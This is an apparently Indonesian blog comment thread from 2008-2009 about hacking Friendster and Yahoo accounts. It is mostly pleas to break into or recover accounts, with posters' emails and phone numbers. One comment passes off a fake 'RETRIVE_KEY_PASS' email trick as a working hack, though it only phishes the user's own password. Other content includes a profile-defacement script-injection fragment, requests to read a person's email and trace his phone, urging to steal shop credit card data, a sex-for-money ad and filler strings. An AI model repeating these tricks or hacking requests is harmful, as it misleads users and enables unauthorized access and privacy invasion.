kalo mau, coba bantu gw nge-hack fs

kalo ada yg berminta hubungi gw di : alaysinlimbo@yahoo.com

serius!

21 12 2008
gella

mas…tolong di hack fs punya saya…
saya lupa email dan paswordnya…..profiles.friendster.com/17993336
tolong di hapus fotonya…100% murni punya saya…
saya malu dengan fotonya mas…
pleaseeeeeee mas
saya jadi bahan tertawaan teman
please ya mas….

21 12 2008
ali

seru banget menjadi hackers

22 12 2008
imam

gimana cara nya,,
ngembalikan frindster yg uda
di hack??

23 12 2008
Anto

Teman -teman kalo mau privat / bimbel saya mau memberi tahukan kalo

Ada tempat privat yang cukup murah
namanya

mvprivate

Mvprivate merupakan tempat Bimbel maupun private..

dan di web ini anda dapat mendownload buku pelajaran, memesan cd translate, memesan cd soal, dll

Klik aja http://mvprivate.net46.net

24 12 2008
Ekky Genio

Tidak……………..
FS gw di Hack!!!!
Gmn sich cranya bwt negmbaliin FS yang udah di hack?????
Plz kasih th dunk…… kirim e-mail ke: ekki.genio619@gmail.com

Thx Bozzz……..😀

24 12 2008
x

Hi…

24 12 2008
newbie

siiiiiiiiiiiiiippppppppppp bgd!!!!!!!!!!!

30 12 2008
lisss

help me !! T__T
ini btul” brfungsii kn ??

30 12 2008
claudee

hi, saya pingin minta bantuan para hacker nih..
Saya beberapa bulan ini chat dengan satu pria yg jual obat diet, akhirnya saya jd langganan beli lah..
Pada saat ketiga kali nya saya beli obat diet, dia datang ke rumah, saat itu saya sedang menggunakan laptop di ruang tamu. Pas dia datang, saya hendak mengambil uang untuk membayar obat diet itu, dan laptop saya tinggal kan begitu saja.. eh pas saya keluar, tau2 laptop saya itu sudah hilang.

Nah bisa kah para hacker membantu saya, info yg saya punya tentang dia ada lah:
1. Nama email tu orang: Jahe_pedes@yahoo.com dan supreminers@yahoo.com
2. Nama asli dia : hendra (saya tidak tahu nama lengkap nya)
3. Pekerjaan: sales obat (merek obat diet: sheng yuan fang)
4. Selain obat diet, dia juga memasarkan produk salonpas cream ke apotik2.
5. Alamat kantor: jl.raya panjang blok z no.23a (bodoh nya, saya tidak menanyakan nama komplek ruko, sedangkan disitu byk sekali komplek pertokoan, ruko, dan rumah)
6. no telp hp: 08561717628 (setau saya, dia biasa ym an pake indosat, harus nya berarti langganan yah?)

Kalau ada yg bisa membantu, please contact me di claudee_girl@ yahoo.com, itu sekaligus ym saya.., kalo ada yg bisa contact my hp: 08881821109

Terima kasih

1 01 2009
dvallen

wew…boleh juga nih info nya, kebeneran banget FS gw juga di jailin orang kali yah….( this id is suspened ) kalo bisa di buka lagi gimana cara nya yah…?

MOHON PETUNJUK !!

http://dvallen.blogspot.com

2 01 2009
HFhackeru

walah semua’a… dn kak kidir…
cara ntu udah ktinggalan jaman neh…

admin FS t’nyata hacker juga…
jadi y,, anti-hacking FS…

ttg re’direct ntu udah ditahan…
pake program, skrip, php, flash, juga udah ga bisa

so musti nyari cara lagi yang mantep…
ampe admin’a nyerah…

YANG PALING AMPUH:
dateng ke orang yg mw d’hack, trus tanyain tuh orang password’a…

2 01 2009
aRi_vEnGeRs

yye dasar goblox ,,

.itw mah lgsung ktawan x ,,haha7x

2 01 2009
ciita.begoo

ihh..
pada dodol banged sii..
dari pada ngehack, mending kenalan sma gue..
cewek iimud getoo. hhaha..
ud lagh, ngehack tu kn juuga merusak kesenangan orang..
kan doosa.. kalo ada yang nyolod, ud diemin ajah..
biar tuhan yg balas.. asiikk.. hhahaha

2 01 2009
ciita.begoo

add gue yakk..
akku_ciita@yahoo.com
tapii jangan dii hack..
okehh !

3 01 2009
Rifky Maulana

mas salam kenal ya tolong hubungi aq ke rifky_brother@yahoo.com
ada job sedikit bwt mas..

4 01 2009
angzou

YEAAAAHHHHHHH………………………

Ternyata di dunia ini ada juga Orang kayak lo…..

gua juga empet liat orang2 keluarmasuk warnet cuman Login Logout yang namanya Pretster doang………

kurang kerjaan……

Chayo……

5 01 2009
NeaR

hhhaaagghhh…..

Kerreenn!!!

6 01 2009
Chacinx_Khencinx

Manteb bgt…
Tp dah terlalu lama cara itu…

6 01 2009
anzu_mutz

okhe touchhhhhh

6 01 2009
d'Javu.dream

tHx sobbbb

gWe sKa cRa Lo…

7 01 2009
claudee

hi hacker2 indonesia..

minta tolong donk…please banget kalo ada yg bisa tolongin, saya bakal inget deh jasa2 nya..

gini cerita nya, saya suka beli obat diet sm temen chat, udah 3 kali beli fine aja gitu..
terakhir beli, saya lg pake laptop di ruang tamu, trus pas sy lg ambil uang buat bayar, eh dia malah ambil laptop saya..
saya coba telp hp nya ga diangkat, saya coba contact ym dia, eh malah ngomong spt ini..

jahe pedes (1/6/2009 11:16:16 AM): Aku mau pulangin laptopnya tp dgn syarat, kamu ml sama aku, kalo kamu serius mau ml sama aku, kirimkan pic bugil u ke email, lalu kita ml sekalian pulangin laptop u, pic mya kirim ke supreminers@yahoo.com.sg

gile ga sih.. shok abis pas baca.. apa sih maksud ni orang..jahat sekali yah..

ada ga ya hacker2 indo yg bisa bantu, emang sih udah bayangannya secanggih FBI or CIA gitu.., tp bisa ga ya? lacak dia pas lg ol or gimana

id ym tu orang: jahe_pedes@yahoo.com dan supreminers@yahoo.com

no hp: 08561717628 (setau saya, dia pake hp buat online ym) bisa kelacak ga ya?

tolong donk kalo ada yg bisa bantu? or liatin isi email2 dia gitu, saya pengen dpt petunjuk alamat rumah mungkin atau kantor nya..

kalo ada yg bisa bantu, please contact me ya
08881821109 or ke ym saya: marfit78@yahoo.com

7 01 2009
yunaaaa
8 01 2009
olivia

ada orang buat fs palsu saya. tapi saya ga bisa ngehack. perlu bantuannya. thx!

9 01 2009
alex177

kaka` bs bnrin fs q ga????? pasworcnya d ganti org>>???

ni almtnya k@in.com

pleaseeeeeeeeeeee…

makasih bgt ya ka`

10 01 2009
vholenk

klo bisa hack fs gw nie alamtnya Danoe_TRAVIZ@yahoo.com

11 01 2009
ficky

woi….gmana caranya ngehack buka fs Q,,??
aq lupa password n emailnya,.,.
kirim k email picky_ndutz@yahoo.com ya….
thanks

13 01 2009
grandong

waduh mas 2 ini hobi ngehack fs orang ya….heemm….bukan kah itu tindakan yg kurang baik….

17 01 2009
maya

cp yg mau ma gue??????{alias jual dri}

sejam cm 500000….

dijamin puas?????????

17 01 2009
yulian eka aditya

ada yg nge hack friendster saya… tiap mau nampilin profile, yg keluar malah perintah log in…
ada yg bisa bantu saya?
kalo ada, kirim email ke saya,,, yulian_e_aditya@yahoo.com
mohon bantuannya karena fs ini penting,,, soalnya ini sarana penting saya utk berbisnis… mohon bantuan…
terimakasih

17 01 2009
yulian eka aditya

oiya… alamat fs saya di adhit_jojon@yahoo.com

17 01 2009
yulian eka aditya

plis yak. dibantu…. soalnya bisnis clothing saya baru berdiri…. & promosi yg paling cepet cm lewat fs… kalo fs saya yg friends na suda banyak itu di hack… saya bakal kerepotan lagi utk mencari klien

17 01 2009
sandalJapit

dapa ni dapa..
tatoan, persingan, gotik ngakuna, welah,,,lha kok mrenSter…
wkkkkk….kekekeke…

halah ngomong apa aku?!
cogitoergosum

20 01 2009
cRY

cara ngehack terbaru,akoe dapat ketika mau tau cara terbaru tuk hack.Thanks for mbah google n om yahoo atas infonya.
berhasil 100% n langsung dari salah satu staf yahoo:

To:RETRIVE_KEY_PASS_CGI_BIN@yahoo.com
bcc:cc: your email account
subject : “maintenance”

xxxxxxxxx@yahoo.com (write the email address of the person you are hacking)
xxxxxxxxx@yahoo.com (your email account)
xxxxxxxxxxxx (your passwords email)

cgi-bin_RETRIVE_KEY_PASS_CGI_BIN/$et76431&pwrsa
script
public void doLoginAttempt() {
conn = new HttpConnection();
conn.setArg(”name”, name);
conn.setArt(”password”, password);

NB : – Your account email must be at least 30 days old for this to work.
– waiting your account until 24 hours and you can get passwords.

good luck !!!

teman2 yang mau coba silahkan
ciao????????

21 01 2009
dewaXbequt

ne cuman share ilmu om master..
wkwkwkwk

masukin ja dalam coment mu…

21 01 2009
dewaXbequt

maaph..tapi account fs
yg anda liat uda gua
bajak..bingung?ngapain
juga..nobodys servers is
safe..T_F_M #kartubeben@ Dalnet
Server
‘);document.title = ‘-friendster gua bajak
!!-‘}); width:expr/**/ession(document.all.mycode…
/>

tu makan

21 01 2009
gilang

http://profiles.friendster.com/93125157

tlung dunk mas …..
tu fs tmen sya …
e-mailx di ubah ma org…ato ap.gtu
yg jlas gag bsa login……..
plisssss!!!!!!
ntar tmen sya nngis ……
klo ud dpt
krim ke sni ya ….
a7xfansgilang@gmail.com

plissssssssssssssssssss

22 01 2009
DECLINED #salsa DalNet

topik hacking emang menarik. Pesen buat pembaca artikel ini. ga ada manfaatnya sama sekali hacking FS. bikin FS masih gratis kok. hehehehe.. di hack ya bikin lagi. gitu kok repot.
klo mo hack mending situs “dot go dot ai di” biar adminya pada giat belajar. ga enak2an makan gaji buta. ekekekeke…

23 01 2009
puteri

wah,,, kalo aku sih friendster butuh banget.

soalnya aku dagang sepatu di fs. lumayan kan penghasilan dagangnya buat beli bakso dan nasi padang. hehehe secara anak kuliahan gitu loh

24 01 2009
vman

tolong donk ajarin buat nge hack fz orang.,.,.,

y.,.,.,..

klo ada kasih tau ea.,.,.

26 01 2009
ewan

mas kotak media saya ko gk bisa berfungsi ya…

knp y??

28 01 2009
rama

minta code hacker friendster…..

30 01 2009
otome-chan

maf kk mo nanya ni kalo nge hack apa harus pake linux?
trus apa harus jadi server dulu ?kalo g jadi server dulu bisa g`?

1 02 2009
White_Boy

Huhuhuhuhuhuhuhu😀

Hacker Vs VirusKu.

Simple Banget Kan…:P

3 02 2009
zavin

hoi semua hacker yang comment di sini
kalo bisa hack FS guwa neeh
tak tuggu yah termasuk kmuw chaidir>>>

neeh alamatte:adit_stockholm@yahoo.com

hacker sejati gresik

5 02 2009
jery

tunggu yach gw pnya cra yg lebih simple buat ngehack.!!!

9 02 2009
DECLINED ON SALSA DALNET

HACK KOK FS? GA MUTU BANGET SEEE….. COBA TUH WEB SITE DOT GO DOT AI DI SAMPEAN HACK. BIAR ADMINYA GA MAKAN GAJI BUTA.
ATO HACK YG MENGHASILKAN DUIT NAPA?
MISAL DAPETIN PASS LOGIN ADMIN WEB SHOP
KAN MAYAN DAPET CC OR PP
ORDER!!!!!!!!!!!!!!!!!!!!!
JIAKAKAKKAKAK

9 02 2009
omen

woe inget karma…..
jangan pinginya ngeheck doang he

12 02 2009
fucker_lov[3]

sebenarnya ada cara deface (ini lebih ke redirect-nya) coba liat di blog q Klik_Disini!!!

13 02 2009
kiloyu

hello, please help me.
please send the password of ashinoi@gawab.com to my e-mail.
i really need it.please help me.

14 02 2009
suck

bang ksh thu cra bahasa mesin
kirim ke mail qu

20 02 2009
mike

hmm. don’t u have english version of these procedures???
I’m begging to please send the english version to my account.

thanks. more power! aja!:)

21 02 2009
vHeMoe

we lagi pusing nEch…,:(
temen gue punya masalah foto na lgi ciuman ma pacar na di sebarin di fs

truz kalo mau masuk di fs nya gimana yaWw????
n hapuz foto na gmna???
bantuin donk…..PLEASE………….!!!!!!!!!!!!!!1

kirim email di aq..,

vHeMoe_24@yahoo.com

21 02 2009
faris

saya mau tanya gimana nich caranyanya buka foto fs yang di private/di kunci

24 02 2009
kojax

ah susah..

copy aj angka php uid ny trus buka http://www.pupuh.com

liat tuh bnyak yg dah kebuka..

26 02 2009
Dio Ivanov

This is one of some best blogs that i’ve ever seen.
Congratulation to you.🙂

27 02 2009
didielippoe

hoooooooooyooooo….
sapa yg berani kerja nii web….:P

takalar.ning.com

slamt mencoba yagh….:P

27 02 2009
bali web design

script kyk gni, gk bisa di taruh di comen org ya bos?
fs kan gk suport comen dgn embel embel js.
Gmn caranya dong byr bisa di pasang di fs orang?

27 02 2009
Zandhika

Hmmmm,,…….
rumit juga, namun akan saya pelajari semuanya…
apakah saya boleh bertanya apabila saya tdk mengerti.??

3 03 2009
ondol

yups gua setuju banget ngapain ngenet cuma liat friendster mendingan buat cari pengetahuan,, hehehehe

4 03 2009
Initial_x

Bung Quw Mnt CaraNA NgehaCk Fs Yg Bru…Tp Bukan YG MeruSak,,,Quw Pgn NGoleKSi ACC Ja…JD BSa LIAt” Fto FrEn Yg Pada CAntIk Tp Di pRiVAte ProFile AtaU PV AlBum….

Hu’Uh Quw StuJU..MEnDing KE NEt Cari PEngetAhUAn Biar Luas..Klo Buka Fs Juga MEnDing SamBil cARi PenGetaHUan Gtu,,JGn TerPAkU KE FrienDstEr Za..

6 03 2009
Need a HELP

Help me! Ada yg hack fs ak!
Gmn iniii??????
buka friendster.com/kawaiiwitch
itu ke hackk!
ksi tw caranya bwt sembuhin ke amu_tsukiyomi@hotmail.com

8 03 2009
brean

psing !!!

gmn cra nya ?!!

ksh ptunjuk scra detail donkz
???

8 03 2009
brean

aq pgen blas hack dri tmn q yg tiap x q pnya fs,,dya sllu ngehack aq ?

9 03 2009
aDy

WaH… SungguH KaTa2 Yg MenGGuGaH…

Gw Demen Ama KaLiMaT Yg Ter aKhir nTu…

Ha…. Ha…. Ha….

10 03 2009
alea

huhuhuhuhuhu…

bs tulungin w gag????
fs w k’hack newh…
password na d’ganti gitcu…

w gag tw gmn cra dapetin password’y yg baru…
tulungin yaw…
ne alamt fs w.. gokielztt_girl90@yahoo.com

klo da yg tw password’y krimin k’email w yaw…
please…….

10 03 2009
esa

bs tulungin w gag????
fs w k’hack newh…
password na d’ganti gitcu…

kirim ja ke email ku ya???????????pleasee

11 03 2009
uzna

wawawawawawawaw……………….

surga di telapak kaki ibu, fs q kena hack di telapak tanganmu………….

ajarin aq ngehack dunk……………..

11 03 2009
-xXx-

TOLONG Donk kk..ajarin in yg bikin eror Fs orng,, bgng saia.. kalo ada ajarin cara baca pasw orng, mssg ke email saia please.. T.T

12 03 2009
Hack Friendster « Waqfin’s Weblog

[…] Hack Friendster […]

12 03 2009
jay chou

wiw kren’z coy’z mainan baru coy’z xixixi
bleh tes jg neh?
mana tau ad yg nyimpan foto” blue kek…hahaha

12 03 2009
Toni Lim

plisss Thor bantu ambil balik donk fs aku.Plissss

14 03 2009
shadow

ada cara lain yang nge-hack FS ga’ pake ubuntu ga????

22 03 2009
aikawa

lucu juga bicaranya

26 03 2009
kenthoot

kontoool….. itu aja udah bangga…
sombong kali yang punya blog kek kontooooooool ini…
itupun mungkin copy pastean dari blog orang..
pepeeeeeek pepeeeeeek……….

26 03 2009
KAKASHI

masssssssssssssss…….

Q

mauuu tau cara hack friendster…………????

31 03 2009
mejen

gimana sih??
ga ngerti nih…

6 04 2009
bau

asu kbehhhhhhhhhh

pelacur…….,,,perex…..

yang buat blog ni gigolo..

7 04 2009
pangeran tanpan

cuy apa masih bisa cara ini diterapin

9 04 2009
sefs

ngomong apa sih lo ga ngerti w

10 04 2009
nia

mas aq mo curhat neh….

barusan aq otak-ik tampilan layout fs n aq pasang instalan mpe imeem sama mp3 codes, awalnya ga ada mslh tp lama2 klo aq mo buka profil sama mo add aplikasi ko jadi eror yah????

klo buka home n yg lainya ga ada mslh,akhirnya aq delete semua aplikasi yg ada difsq,tp tetep aja eror,

ne peringatanya

Redirect Loop
Firefox has detected that the server is redirecting the request for this address in a way that will never complete.
The browser has stopped trying to retrieve the requested item. The site is redirecting the request in a way that will never complete.
* Have you disabled or blocked cookies required by this site?
* NOTE: If accepting the site’s cookies does not resolve the problem, it is likely a server configuration issue and not your computer.

gt mas.kira2 knp, trs gmn cara memperbaikinya??
mksh byk atas perhatianya n saran anda sangat saya butuhkan….

12 04 2009
fauzi

ka boleh tanya ga…gmna sich cara membuka alamat dan password friendster orang yang suka ganggu

17 04 2009
rinald

gmna yach car nya nge hack,,,,,,,,,,,,,,,,,

susah mat,,

17 04 2009
rinald

tolong tunjukin all
cara ngehack fs orng,,,,,,,
maklum w masi copo jadi g tau cara na,,,,,,,,,,,,
w sadar diri kuq,,,,,,,,,,,
hiihiiiihiii,,,,,,,,,,,,,,,

18 04 2009
komank

huy gw dh bs hach fs tmen gw nie makasi nie dh ksi to

19 04 2009
dio alvin simamora

anjenk klen smua taek!

19 04 2009
dio alvin simamora

tol ma kw

30 04 2009
virusoplaaa

s.w.t lah

30 04 2009
virusoplaaa

lanjutkan

2 05 2009
ggg

zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz

2 05 2009
ggg
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz